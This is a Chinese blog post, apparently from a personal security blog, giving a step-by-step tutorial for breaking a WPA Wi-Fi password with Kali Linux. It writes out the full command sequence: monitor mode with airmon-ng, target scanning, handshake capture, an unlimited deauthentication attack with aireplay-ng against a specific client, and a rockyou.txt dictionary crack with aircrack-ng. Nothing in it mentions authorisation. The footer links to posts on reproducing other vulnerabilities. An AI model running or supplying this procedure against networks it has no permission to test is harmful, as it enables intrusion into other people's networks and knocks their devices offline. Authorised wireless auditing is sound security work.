kali抓包破解WIFI密码

0x01 前言

使用kali破解wifi密码,如果kali安装在虚拟机,需要一个外置usb网卡。

0x02 开始

查看插入的网卡

打开kali虚拟机,插入USB无线网卡,打开终端

iwconfig

查看无线网卡

airmon-ng
上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。

开启网卡监听模式,记录Interface名称,杀掉其他使用WiFi进程

airmon-ng start wlan0
如果有下图提示表示有其他网卡处于监控模式。
使用
airmon-ng check kill
结束其他使用WIFI进程
在执行
airmon-ng start wlan0
记住interface名称。



扫描信号

airodump-ng wlan0mon

  • BSSID是AP端的MAC地址
  • PWR是信号强度,数字越小越好
  • Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
  • CH是对应路由器的所在信道
  • ESSID是对应路由器的名称

找到目标后,ctrl + c 中止

抓取握手包

airodump-ng -c 11 -w ./test --bssid 78:44:FD:83:0B:2C wlan0mon
airodump-ng -c <AP的信道> -w <抓取握手包的存放位置名称> --bssid <AP的MAC地址> <你的的Interface名称>

解除认证攻击

保持上一个terminal窗口的运行状态,打开一个新的terminal,进行解除认证攻击
强制连接到wifi的设备重新连接路由器,掉线设备重连后,如图所示位置显示WPA handshake --即成功抓取到握手包。
两个terminal使用ctrl+c终止攻击和握手抓包。

aireplay-ng -0 0 -a 9C:A6:15:D0:04:C9 -c D8:32:E3:A7:B9:6F wlan0mon
aireplay-ng -<攻击模式,我们这里使用 解除认证攻击(数字0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <interface名称>

关闭无线网卡的监听模式

airmon-ng stop wlan0mon

使用字典暴力破解

kali下自带一份无线密码字典 –>/usr/share/wordlists/rockyou.txt.gz
解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz

aircrack-ng  -w  /usr/share/wordlists/rockyou.txt  -b  BC:46:99:3D:66:D6 tplink-01.cap
#-w指定 密码字典 -b指定路由器的MAC地址

爆破成功后,如图区域位置显示KEY FOUND!字样,中括里为AP端的密码。

over!

参考文章

使用Aircrack-ng 工具进行WIFI的监听和破解 - 林中静月下仙的博客


   转载规则


《kali抓包破解WIFI密码》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
泛微OA  WorkflowCenterTreeData接口注入漏洞复现 泛微OA WorkflowCenterTreeData接口注入漏洞复现
0x01 前言在CNVD上刚发现泛微OA的新漏洞,就有大佬发出漏洞细节,就进行了复现。 0x02 漏洞影响攻击者可利用漏洞获取数据库敏感信息。 (限Oracle数据库) 影响版本 暂不明确 0x03 漏洞分析泛微e-cology OA系统
2019-10-10
下一篇 
phpStudy后门漏洞复现 phpStudy后门漏洞复现
0x01 漏洞概述phpStudy是一款PHP调试环境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP
2019-09-23
  目录